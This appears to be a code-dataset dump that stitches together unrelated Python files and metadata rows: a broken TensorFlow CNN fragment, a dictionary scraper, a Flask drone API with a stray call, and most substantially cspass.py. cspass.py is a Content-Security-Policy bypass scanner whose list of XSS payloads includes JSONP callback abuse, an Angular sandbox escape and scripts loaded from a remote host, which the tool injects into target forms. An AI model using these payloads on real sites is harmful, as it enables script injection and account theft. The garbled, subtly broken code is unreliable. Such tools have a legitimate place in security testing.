See: https://github.com/tensorflow/tensorflow/blob/r0.11/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py
"""
with tf.name_scope(layer_name):
# This Variable will hold the state of the weights for the layer
with tf.name_scope('weights'):
weights = weight_variable([input_dim, output_dim])
variable_summaries(weights, layer_name + '/weights')
with tf.name_scope('biases'):
biases = bias_variable([output_dim])
variable_summaries(biases, layer_name + '/biases')
with tf.name_scope('Wx_plus_b'):
preactivate = tf.matmul(input_tensor, weights) + biases
tf.histogram_summary(layer_name + '/pre_activations', preactivate)
activations = act(preactivate, name='activation')
tf.histogram_summary(layer_name + '/activations', activations)
return activations
def conv_relu(input_tensor, kernel_shape, bias_shape):
# Create variable named "weights".
weights = tf.get_variable("weights", kernel_shape,
initializer=tf.random_normal_initializer())
# Create variable named "biases".
biases = tf.get_variable("biases", bias_shape,
initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(input_tensor, weights,
strides=[1, 1, 1, 1], padding='SAME')
return tf.nn.relu(conv + biases)
def board_filter(input_board):
with tf.variable_scope('conv1'):
relu1 = conv_relu(input_board, [3, 3, 32, 32], [32])
with tf.variable_scope('conv2'):
return conv_relu(relu1, [3, 3, 32, 32], [32])
# Unpack parameters
X = self.X
params = self.params
# Convolution Layer
with tf.variable_scope('conv1'):
conv1 = conv_relu(X, [1, 1, 1, 32], [32], 'conv1')
# conv1 = conv2d(X, params['Wc1'], params['bc1'])
# Convolution Layer
with tf.variable_scope('board_filters') as scope:
# conv2 = conv2d(conv1, params['Wc2'], params['bc2'])
result1 = board_filter(conv1, [3, 3, 32, 32], [32], 'conv2')
# Convolution Layer,
# Share weights within scope
scope.reuse_variables()
# conv3 = conv2d(conv2, params['Wc2'], params['bc2'])
result2 = board_filter(conv2, [3, 3, 32, 32], [32], 'conv3')
# with tf.variable_scope("foo"):
# v = tf.get_variable("v", [1])
# tf.get_variable_scope().reuse_variables()
# v1 = tf.get_variable("v", [1])
# assert v1 is v
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc1 = tf.reshape(conv3, [-1, 9 * 9 * 32])
fc1 = tf.add(tf.matmul(fc1, params['Wd1']), params['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
with tf.name_scope('dropout'):
tf.scalar_summary('dropout_keep_probability', self.dropout)
fc1 = tf.nn.dropout(fc1, self.dropout)
# Output, class prediction
# out = tf.add(tf.matmul(fc1, params['Wout']), params['bout'])
out = nn_layer(fc1, 32, 2, 'out', act=tf.identity)
return out
@define_scope
def train(self):
"""
Train
"""
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
minimize = optimizer.minimize(self.loss)
return minimize
@define_scope
def loss(self):
"""
Cost
"""
with tf.name_scope('cross_entopy'):
diff = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.inference, labels=self.y)
with tf.name_scope('total'):
cross_entropy = tf.reduce_mean(diff)
tf.summary.scalar('cross_entropy', cross_entropy)
return cross_entropy
@define_scope
def predict(self):
"""
Predict
"""
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.nn.in_top_k(self.inference, self.y, 1)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.scalar_summary('accuracy', accuracy)
return accuracy
| 32.156863 | 119 | 0.685366 | 6,455 | 0.983994 | 0 | 0 | 5,066 | 0.772256 | 0 | 0 | 2,291 | 0.349238 |
d32d4989ddb61c61ac3a74c50608bb06d99de21a | 4,016 | py | Python | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | 1 | 2021-10-14T21:30:56.000Z | 2021-10-14T21:30:56.000Z | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | 2 | 2021-10-08T00:30:22.000Z | 2021-10-30T02:10:37.000Z | nihongo_companion/dictionary/nihongomaster.py | northy/anki-nihongo-companion | d238c3a0b0b195e857b0914570a824a492d2840c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# MIT License
# Copyright (c) 2021 Alexsandro Thomas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from .base import *
class NihongoMaster(WebDict) :
def search(self, query:str) -> Generator[list,int,int] :
return_results = []
query = quote(query)
page = 1
while True : #page
soup = self.__urlGet__(f"https://nihongomaster.com/japanese/dictionary/search?type=j&q={query}&p={str(page)}")
if soup==None : yield None, None, None; break
results = soup.find("div", class_="results")
if results==None : yield None, None, None; break
for result in results.find_all("div") :
return_results.append({
"title": result.find("h2").text,
"kana": result.find("h3").text if result.find("h3")!=None else result.find("h2").text, #may not have kana
"type": result.find("dt").text,
"english": list(map(lambda x : x.text, result.find_all("li"))),
"uri": result.find("a", href=True)["href"]
})
count = soup.find("h1", class_='text-lg md:text-2xl xl:text-4xl font-bold text-center md:text-left mt-4').text.strip().split()
cur,tot = int(count[4]), int(count[6])
yield return_results, cur, tot
return_results.clear()
if cur==tot : break
page+=1
def get_examples(self, uri:str) -> List[dict] :
return_results = []
soup = self.__urlGet__(uri)
if soup==None : return None
results = soup.find("div", id="examples")
if results==None : return None
try :
for result in results.find("div", class_="w-full").find_all("div", class_="flex") :
return_results.append({
"japanese": ''.join(map(lambda x : x.strip(),result.find("div", class_="p-2 font-bold").find_all(text=True))),
"english": result.find_all("div")[1].text.strip()
})
except :
return None
return return_results
if __name__=="__main__" :
print("(Using nihongoMaster webdict as dictionary)")
nm = NihongoMaster()
query = input("What to search? ")
results = nm.search(query)
if results!=None :
i=1
for result in results :
print(str(i)+')')
print(result["title"])
print(result["kana"])
print(result["type"])
for english in result["english"] :
print(' -',english)
print()
i+=1
else :
print("Nothing found")
exit(1)
option = int(input("which one? "))
examples = nm.get_examples(results[option-1]["uri"])
if examples!=None :
for example in examples :
print(example["japanese"])
print(example["english"])
print()
else :
print("No examples")
exit(1)
| 38.990291 | 138 | 0.594871 | 1,997 | 0.497261 | 1,269 | 0.315986 | 0 | 0 | 0 | 0 | 1,639 | 0.408118 |
d32db38b32c9c1c912fe1cbdd41b39ddaa026dbb | 437 | py | Python | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 6 | 2021-03-18T16:18:53.000Z | 2022-01-18T15:32:15.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2020-12-22T16:19:20.000Z | 2022-02-11T11:03:25.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2021-04-12T03:00:28.000Z | 2022-03-25T19:53:43.000Z | """
predefined params for openimu
"""
JSON_FILE_NAME = 'openimu.json'
def get_app_names():
'''
define openimu app type
'''
app_names = ['Compass',
'IMU',
'INS',
'Leveler',
'OpenIMU',
'VG',
'VG_AHRS',
]
return app_names
APP_STR = ['INS', 'VG', 'VG_AHRS', 'Compass', 'Leveler', 'IMU', 'OpenIMU']
| 19 | 74 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 190 | 0.434783 |
d32dd1934f4c68dc0cb20d9f2ee7231658679268 | 4,073 | py | Python | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | app.py | dhill2522/DroneWeatherApi | fe8196c78597d4089359cd872491441690f6899f | [
"MIT"
] | null | null | null | from flask import Flask, request, Response
from flask_cors import CORS
import drone_awe
import json
import copy
import traceback
import utilities
'''
Notes:
- Need to disable plotting in the library
- if possible remove matplotlib entirely from the library
- if possible remove gekko object from a.output in order to make it JSONSerializable
'''
app = Flask(__name__)
CORS(app)
@app.route('/')
def root():
return json.dumps({
'msg': 'Drones and weather API 0.0.2. See DroneEcon.com for details.'
})
@app.route('/getValidationCases')
def getValidationCases():
try:
data = drone_awe.validationdatabase
data = [d for d in data if 'xvalid' in d]
resp = Response(json.dumps(data))
return resp
except Exception as err:
return utilities.handleError(err)
@app.route('/getDrones')
def getDrones():
try:
drones = copy.deepcopy(drone_awe.drones)
resp = []
for drone in drones:
el = {}
if 'battery' in drone:
for prop in drone['battery']:
l = list(filter(lambda el: el['param'] == prop, utilities.ParamMap))
if len(l) > 0:
el[l[0]['display']] = drone['battery'][prop]
del drone['battery']
for prop in drone:
l = list(filter(lambda el: el['param'] == prop, utilities.ParamMap))
if len(l) > 0:
el[l[0]['display']] = drone[prop]
resp.append(el)
return Response(json.dumps(resp))
except Exception as err:
utilities.handleError(err)
a.simulate()
@app.route('/simulate', methods=['POST'])
def simulate():
try:
# Track Z-variable
zParam = None
params = {}
if request.data:
params = json.loads(request.data)
# zParam = params['zParam']
for arg in utilities.DefaultArgs:
if arg['name'] not in params:
print(f'Missing', {arg['name']}, 'Using default value:', {arg['default']})
params[arg['name']] = arg['default']
a = drone_awe.model(params)
try:
a.simulate()
data = a.output
resp = {
'error': False,
'errorType': None,
'log': 'Successful simulation',
'plottables': [],
'zAxis': {
'id': zParam,
'displayName': '',
'values': []
}
}
if zParam:
resp['zAxis']['displayName'] = data['zvals']
for key in list(data.keys()):
if key != 'zvals' and type(data[key][0][0]) != str:
l = list(filter(lambda el: el['param'] == key, utilities.ParamMap))
if len(l) >= 1:
displayName = l[0]['display']
plottable = {
'id': key,
'displayName': displayName,
'values': data[key]
}
if key == 'missionspeed':
print(plottable)
resp['plottables'].append(plottable)
else:
print(f'Missing ParamMep entry for {key}')
resp = Response(json.dumps(resp))
return resp
except Exception as err:
resp = {
'error': True,
'errorType': None,
'log': 'Simulation failed: ' + err.__repr__(),
'plottables': [],
'zAxis': {
'id': zParam,
'displayName': '',
'values': []
}
}
resp = Response(json.dumps(resp))
return resp
except Exception as err:
return utilities.handleError(err)
if __name__ == '__main__':
app.run()
| 30.395522 | 90 | 0.470169 | 0 | 0 | 0 | 0 | 3,629 | 0.890989 | 0 | 0 | 848 | 0.2082 |
d32e8c56edc32689975959c28267b672389c92f8 | 25,521 | py | Python | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 30 | 2021-11-01T15:55:39.000Z | 2022-03-24T16:57:23.000Z | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 1 | 2022-01-30T13:45:29.000Z | 2022-01-30T14:43:10.000Z | cspass.py | Ruulian/CSPass | e608331b429e9a7e759ef4f54a66b25a179f724a | [
"MIT"
] | 2 | 2021-11-08T15:52:33.000Z | 2022-02-10T09:19:50.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : @Ruulian_
# Date created : 31 Oct 2021
from random import choice
from requests_html import HTMLSession
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urljoin, urlparse
import argparse
import datetime
import json
import platform
import re
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
color = choice([35, 93, 33])
nonce_reg = r'nonce\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
sha_reg = r'sha\d{3}\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
general_payload = "alert()"
policies_fallback = {
"script-src":"default-src"
}
vulnerable_CSP_conf = {
"script-src" : [
{'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<script>{general_payload}</script>'},
{'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<img src=# onerror={general_payload}>'},
{'value': ['*'], 'patch':[], 'payload': '<script src="https://0xhorizon.eu/cspass/exploit.js"></script>'},
{'value': ['data:'], 'patch':[], 'payload': f'<script src="data:,{general_payload}"></script>'},
{'value':['https://cdnjs.cloudflare.com', 'unsafe-eval'], 'patch':[], 'payload':"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js\"></script><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };%s;//');}} </div>" % general_payload},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback={general_payload}"></script>'},
{'value': ['https://*.doubleclick.net'], 'patch':[], 'payload': f'"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback={general_payload}"></script>'},
{'value': ['https://*.googleadservices.com'], 'patch':[], 'payload': f'"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback={general_payload}"></script>'},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback={general_payload}"></script>'},
{'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://accounts.google.com/o/oauth2/revoke?callback={general_payload}"></script>'},
{'value': ['https://*.blogger.com'], 'patch':[], 'payload': f'"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback={general_payload}"></script>'},
{'value': ['https://*.yandex.net'], 'patch':[], 'payload': f'"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback={general_payload}"></script>'},
{'value': ['https://*.yandex.ru'], 'patch':[], 'payload': f'"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback={general_payload}"></script>'},
{'value': ['https://*.vk.com'], 'patch':[], 'payload': f'"><script src="https://api.vk.com/method/wall.get?callback={general_payload}"></script>'},
{'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
{'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
{'value': ['https://*.alicdn.com'], 'patch':[], 'payload': f'"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback={general_payload}"></script>'},
{'value': ['https://*.taobao.com'], 'patch':[], 'payload': f'"><script+src="https://suggest.taobao.com/sug?callback={general_payload}"></script>'},
{'value': ['https://*.tbcdn.cn'], 'patch':[], 'payload': f'"><script+src="https://count.tbcdn.cn//counter3?callback={general_payload}"></script>'},
{'value': ['https://*.1688.com'], 'patch':[], 'payload': f'"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback={general_payload}"></script>'},
{'value': ['https://*.amap.com'], 'patch':[], 'payload': f'"><script+src="https://wb.amap.com/channel.php?callback={general_payload}"></script>'},
{'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback={general_payload};jsonp1"></script>'},
{'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3b{general_payload}%2f%2f794"></script>'},
{'value': ['https://*.uber.com'], 'patch':[], 'payload': f'"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback={general_payload};"></script>'},
{'value': ['https://*.buzzfeed.com'], 'patch':[], 'payload': f'"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback={general_payload}%2f%2f"></script>'},
{'value': ['https://*.co.jp'], 'patch':[], 'payload': f'"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback={general_payload}//></script>'},
{'value': ['https://*.yahooapis.jp'], 'patch':[], 'payload': f'"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback={general_payload}//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3b{general_payload}%2f%2f476&_=1537149044679"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback={general_payload};//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback={general_payload};//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>'},
{'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb={general_payload};"></script>'},
{'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback={general_payload}"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback={general_payload}//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>'},
{'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback={general_payload}//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="http://search.twitter.com/trends.json?callback={general_payload}"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback={general_payload}"></script>'},
{'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback={general_payload}"></script>'},
{'value': ['https://*.sharethis.com'], 'patch':[], 'payload': f'"><script+src="https://www.sharethis.com/get-publisher-info.php?callback={general_payload}"></script>'},
{'value': ['https://*.addthis.com'], 'patch':[], 'payload': f'"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback={general_payload}"></script>'},
{'value': ['https://*.ngs.ru'], 'patch':[], 'payload': f'"><script+src="https://passport.ngs.ru/ajax/check?callback={general_payload}"></script>'},
{'value': ['https://*.ulogin.ru'], 'patch':[], 'payload': f'"><script+src="https://ulogin.ru/token.php?callback={general_payload}"></script>'},
{'value': ['https://*.meteoprog.ua'], 'patch':[], 'payload': f'"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback={general_payload}"></script>'},
{'value': ['https://*.intuit.com'], 'patch':[], 'payload': f'"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback={general_payload}"></script>'},
{'value': ['https://*.userlike.com'], 'patch':[], 'payload': f'"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback={general_payload}"></script>'},
{'value': ['https://*.youku.com'], 'patch':[], 'payload': f'"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback={general_payload}"></script>'},
{'value': ['https://*.mixpanel.com'], 'patch':[], 'payload': f'"><script+src="https://api.mixpanel.com/track/?callback={general_payload}"></script>'},
{'value': ['https://*.travelpayouts.com'], 'patch':[], 'payload': f'"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback={general_payload}"></script>'},
{'value': ['https://*.pictela.net'], 'patch':[], 'payload': f'"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback={general_payload};/json"></script>'},
{'value': ['https://*.adtechus.com'], 'patch':[], 'payload': f'"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback={general_payload};//window.proper_d31c1edc_57a8d6de_38"></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': '"><embed src=\'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch(e){%s}//\' allowscriptaccess=always>' % general_payload},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'ng-app"ng-csp ng-click=$event.view.{general_payload}><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>'},
{'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'<script src=https://www.googleapis.com/customsearch/v1?callback={general_payload}'},
{'value': ['unsafe-inline', '*'], 'patch':[], 'payload':f"<script>script=document.createElement('script');script.src='//0xhorizon.eu/cspass/exploit.js';window.frames.document.head.appendChild(script);</script>"}
]
}
def date_formatted():
return datetime.datetime.now().strftime("%H:%M:%S")
def parse_cookies(arg:str):
cookies = {}
cookies_arg = arg.split(";")
for c in cookies_arg:
cookie = c.split("=")
try:
cookies[cookie[0]] = cookie[1]
except IndexError:
raise argparse.ArgumentTypeError("Cookies must be specified with key=value")
return cookies
class Scanner:
def __init__(self, target, no_colors=False, dynamic=False, all_pages=False, cookies={}, secure=False):
self.no_colors = no_colors
self.all_pages = all_pages
self.dynamic = dynamic
self.target = target
self.secure = secure
self.pages = [self.target]
self.cookies = cookies
self.sess = HTMLSession()
def print(self, message=""):
if self.no_colors:
message = re.sub("\x1b[\[]([0-9;]+)m", "", message)
print(message)
def succeed(self, message=""):
self.print(f"[\x1b[92mSUCCEED\x1b[0m] {message}")
def info(self, message=""):
self.print(f"[\x1b[96m{date_formatted()}\x1b[0m] {message}")
def vuln(self, message=""):
self.print(f"[\x1b[93mVULN\x1b[0m] {message}")
def fail(self, message=""):
self.print(f"[\x1b[95mFAIL\x1b[0m] {message}")
def error(self, message=""):
self.print(f"[\x1b[91mERROR\x1b[0m] {message}")
def banner(self):
self.print(f"""\x1b[{color}m
______ _____ ____
/ ____// ___/ / __ \ ____ _ _____ _____
/ / \__ \ / /_/ // __ `// ___// ___/
/ /___ ___/ // ____// /_/ /(__ )(__ )
\____/ /____//_/ \__,_//____//____/\x1b[0m\x1b[3m by Ruulian\x1b[0m
\x1b[4mVersion\x1b[0m: 1.2
""")
def ping(self):
try:
r = self.sess.get(self.target, cookies=self.cookies, verify=self.secure)
r.raise_for_status()
except OSError:
return False
return True
def get_all_pages(self, page):
r = self.sess.get(page, cookies=self.cookies)
if r.text != "":
links = r.html.absolute_links
for link in links:
if link not in self.pages and urlparse(link).netloc == urlparse(self.target).netloc:
self.pages.append(link)
time.sleep(0.3)
class Page:
def __init__(self, url, cookies, secure=False):
self.url = url
self.cookies=cookies
self.secure = secure
self.sess = HTMLSession()
self.csp = self.get_csp()
self.vulns = []
def get_csp(self):
data = {}
r = self.sess.head(self.url, verify=self.secure)
if 'Content-Security-Policy' in r.headers.keys():
csp = r.headers['Content-Security-Policy']
for param in csp.strip().strip(';').split(';'):
matched = re.search("^([a-zA-Z0-9\-]+)( .*)?$", param.strip())
csp_name, csp_values = matched.groups()
if csp_values is not None:
csp_values = [v.rstrip("'").lstrip("'") for v in csp_values.strip().split(' ')]
else:
csp_values = []
data[csp_name] = csp_values
return data
def format_csp(self):
csp = {}
for policyname in self.csp:
csp[policyname] = " ".join(self.csp[policyname])
csp = json.dumps(
csp,
indent=4
)
return csp
def get_forms(self):
r = self.sess.get(self.url, cookies=self.cookies)
if r.text != "":
forms = r.html.find("form")
return forms
return []
def test_patch(self, patches):
for patch in patches:
patch_policy_name = patch[0]
patch_policy_value = patch[1]
if patch_policy_name in self.csp:
r = re.compile(patch_policy_value)
if any([r.match(x) for x in self.csp[patch_policy_name]]):
return True
return False
def scan(self):
vuln = False
csp_keys = self.csp.keys()
new_csp_keys = []
for policy, fallback in policies_fallback.items():
if fallback in csp_keys and policy not in csp_keys:
new_csp_keys.append((policy, fallback))
else:
new_csp_keys.append((policy, policy))
for policyname in new_csp_keys:
priority = policyname[0]
name = policyname[1]
if priority in vulnerable_CSP_conf.keys():
for exploit in vulnerable_CSP_conf[priority]:
if all(x in self.csp[name] for x in exploit['value']) and (exploit['patch'] == [] or not self.test_patch(exploit['patch'])):
policyvalue = " ".join(self.csp[name])
self.vulns.append({'value':f"{name} {policyvalue}", 'payload':exploit['payload']})
vuln = True
return vuln
class Form:
def __init__(self, url, action, method, names, cookies, secure=False):
self.url = url
self.action = action
self.method = method
self.names = names
self.cookies = cookies
self.secure = secure
self.sess = HTMLSession()
def test_dom(self):
parameters = {}
value = "<em>random_value_t0_test</em>"
for name, val in self.names.items():
if val == "":
parameters[name] = value
else:
parameters[name] = val
if self.method.lower() == "get":
r = self.sess.get(self.action, params=parameters, cookies=self.cookies, verify=self.secure)
elif self.method.lower() == "post":
r = self.sess.post(self.action, data=parameters, cookies=self.cookies, verify=self.secure)
if value in r.text:
return True
else:
return False
def exploit(self, payload, dangling=False):
domain = urlparse(self.url).netloc
if platform.system() == "Linux" or platform.system() == "Darwin":
log_path = "/dev/null"
else:
log_path = "NUL"
options = FirefoxOptions()
options.add_argument("--headless")
wb = webdriver.Firefox(options=options, service_log_path=log_path)
wb.get(self.url)
for key, value in self.cookies.items():
wb.add_cookie({'name':key, 'value':value, 'domain':domain})
for name in self.names:
form_input = wb.find_element_by_name(name)
form_input.clear()
form_input.send_keys(payload)
form = wb.find_element_by_tag_name("form")
form.submit()
time.sleep(0.5)
exploit = False
if dangling:
if urlparse(wb.current_url).netloc != domain:
exploit = True
else:
exploit = False
else:
try:
WebDriverWait(wb, 3).until(EC.alert_is_present())
alert = wb.switch_to.alert
alert.accept()
exploit = True
except TimeoutException:
exploit = False
wb.close()
return exploit
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='CSP Bypass tool')
parser.add_argument("--no-colors", dest="no_colors", action="store_true", help="Disable color mode")
parser.add_argument("-d", "--dynamic", dest="dynamic", action="store_true", help="Use dynamic mode")
parser.add_argument("-a", "--all-pages", dest="all_pages", action="store_true", help="Looking for vulnerability in all pages could be found", required=False)
parser.add_argument("-k", "--secure", dest="secure", action="store_true", help="Check SSL certificate")
required_args = parser.add_argument_group("Required argument")
required_args.add_argument("-t", "--target", dest="target", help="Specify the target url", required=True)
required_args = parser.add_argument_group("Authentication")
required_args.add_argument("-c", "--cookies", dest="cookies", help="Specify the cookies (key=value)", type=parse_cookies, required=False, default={})
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
scan = Scanner(target=args.target, no_colors=args.no_colors, dynamic=args.dynamic, all_pages=args.all_pages, cookies=args.cookies, secure=args.secure)
scan.banner()
scan.info(f"Starting scan on target \x1b[1m{scan.target}\x1b[0m\n")
scan.info("Pinging page")
if scan.ping():
scan.info("Page found\n")
else:
scan.error("Page not found")
exit()
if scan.all_pages:
scan.info("Detecting all pages...")
scan.get_all_pages(scan.target)
scan.info(f"{len(scan.pages)} pages found\n")
for p in scan.pages:
page = Page(p, scan.cookies, secure=scan.secure)
